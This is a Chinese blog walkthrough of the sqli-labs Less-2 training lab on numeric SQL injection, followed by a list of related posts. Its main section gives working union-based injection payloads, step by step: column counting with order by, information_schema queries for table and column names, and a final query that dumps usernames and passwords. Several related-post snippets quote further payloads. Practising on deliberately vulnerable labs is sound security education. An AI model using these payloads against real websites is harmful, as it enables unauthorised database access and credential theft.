sql注入之sqli-labs-less-2 数值型报错注入

已于 2024-03-03 16:47:42 修改
阅读量396 收藏 11
点赞数 7
分类专栏: sql 注入 文章标签: sql 数据库
于 2024-03-03 16:47:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27249127/article/details/136433668
版权

输入?id=1

'  进行试探,第二关数值型,没有字符串的单引号,所以输入单引号报错,

经试探?id=1 order by 5 --+ 如果是错误的数值,显示如下:

正确  的为: ?id=1 order by 3 --+

进行注入查看回显点:

?id=-1%20union select 1,2,3 --+

查看数据库:

查看表:

id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+

查看列名:

/?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27--+

查看字段内容:

/sqli-labs/Less-2/?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x5c,password,0x7e)%20from%20users--+

西蒙娜
关注
专栏目录
我的白帽之路-SQL注入之数字注入【sqli-labs Less-2】
Offsett的博客
02-27 400
我的白帽之路
SQL注入-14】布尔盲注的半自动化注入案例—以sqli-labs-less8为例(利用BurpSuite工具)
m0_64378913的博客
05-12 1654
目录1 概述2 布尔盲注的半自动化注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类2.2.3 爆库名长度及库名2.2.4 爆表名、字段名以及账户及密码3 总结参考文章 本博客内容仅供学习探讨,请勿滥用乱用 1 概述 当改变浏览器带入给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。 布尔盲注:一般情况下,当带入参数为真和假时,页面会有不同的反映,比如有无显示也是
SQL注入漏洞解析--less-2
duoba_an的博客
02-22 578
2.这里正常回显,当我们后边加上'时可以看到报错,且报错信息看不到数字,所有我们可以猜测sql语句应该是数字注入。10用的和第一个数据库一样的,所以里边的内容都是一样的,到这里就结束了。8. 这不,表名(我们用一下users)就出来了,接下来查一下列名。3. 知道时数字注入后就简单了,和之前第一关的差不多一样。4. 我们就一个一个的试,当输入4时报错不知道第四列。9. 这三个已经摆在面前了,那就看一下下里边都有啥。1.提示我们输入id数字,那我们先输入1猜一下。先查库,在查表和列,最后输出显示。
sql注入Less-2
qq_38595432的博客
09-16 244
sql="SELECT∗FROMusersWHEREid=sql = "SELECT * FROM users WHERE id=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1";http://192.168.200.26/Less-3/?id=-1? union select 1,2,database();–+使用id=-1 便可以显示union的内容了 使用–+注释掉 limit后面的内容group_concat(table_name) 去重SQL注入: 随便输入内容
SQLi靶场
diaobusi的博客
10-24 392
在学习SQL注入时,要对SQL的语法有大致上的了解,并且越熟练越好,在进行注入前要仔细分析,它使用的什么类SQL语句,以便对症下药,确定类后,如果是查询类的注入,还要去分析出源语句中,使用了几个字段,当掌握这些信息后,就开始考虑如何闭合语句。判断SQL语句类构造永真POC判断是否存在SQL注入爆破源语句字段数量爆破成功后即可进行攻击在这一关总体思路与第一关基本一致,只不过在本关中使用的是数值内省SQL语句,在闭合语句方面不用考虑引号等关系。介绍了mysql的一个安全配置项。
SQLi-LABS Less-2,联合注入+报错注入_如何判断less-2的注入点
最新发布
2401_83974660的博客
04-18 442
页面显示数据库的报错信息,符合报错注入的条件。按照第4个字段排序开始报错,确定字段数为:3。页面正常报错,确定报错函数可以使用。
sqli-labs靶场第二关
gou1791241251的博客
12-19 769
传入id=1查看页面回显 第一步:判断注入类。如字符数值 传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码 不传入单引号或双引号页面正常 第二步:判断表字段数 使用order by order by 3 时页面正常 order by 4时页面回显异常,所以有三个字段 第三步:使用联合查询获取数据库相关信息与查看页面回显位置 接下来查看数据库名和版本号 接下来通过mysql数据库中的information_schema数据中的tables表来查询所有
Sqli-labs靶场详细攻略Less 34-37
qq_41755084的博客
10-31 1053
这一关还是进行宽字节注入,与上一关的区别在于使用了post方法进行传递。先试一下上一关的注入代码。因为这一关是登录,就使用之前的dumb账号。登陆失败了,也没报错,看一下这个包传递时post方法里参数是咋传的。可以看到,我们输入的注入代码在前端被进行了一个url编码,%被编码成了%25,原来的空格被替换成了+,原来的+被替换成了%2b那我们再把这个包改回来就好,+不用改回空格,在服务端会改回来的。并且经过尝试,这里的列数为2。注入成功。
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1754
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
m0_54899775的博客
12-29 1677
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
sqil-labs sql注入 LESS2联合注入教程
m0_70787202的博客
03-19 196
less2联合注入教程
SQLi Labs Less-1 联合注入+报错注入
wangyuxiang946的博客
06-19 1万+
SQLi第一关,sqllabs less-1,sqli-labs less1
LESS2(sql注入
qq_44598397的博客
03-14 946
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
sql注入less2
Mdcq123的博客
10-15 266
http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union selcet 1,database(),3 http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union select 1,(select group_concat(table_name) from infor...
SQL注入sqli-labs】Less 1 - Less 5 练习笔记
全栈纸伞
07-09 1060
SQL注入sqli-labs】Less 1 - Less 5 练习笔记0x00 部署sqli-labs这部分相信大部分人都会了,我简单推荐一种简单的组合 wamp 实现一键部署,其中包含PHP环境 navicat 导入数据 这里悄悄的给出一种作弊的方法,就是在每句SQL语句后面:echo $sql. '<br>';如果是练习盲注的同学还是老老实实按照不作弊的方式来。0x01 开始练习L
sql注入-Less-2-4
dahege666的博客
04-03 354
Less-2 添加一个id,响应正常 将'(单引号)添加到数字中 我们得到了一个 Mysql 返回的错误,提示我们语法错误。 现在执行的查询语句如下: Select * from TABLE where id = 1’ ; 所以这里的单引号破坏了查询,导致抛出错误。因此我们得出的结果是,查询代码使用了整数。 Select * from TABLE where id = (so...
sqli-libs————Less2(数字注入)
Fly_鹏程万里
05-08 1236
Less2同样,我们根据提示传入参数id,数据类为numeric加入单引号进行测试:爆出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
SQL练习(less-2)报错注入
AmyBaby00的博客
08-13 476
固定格式: Updatexml(1,concat(0×7e,b) Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串 构造语句:union select updatexml(1,concat(0x7e,select database(),0x7e),1) http:/...
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值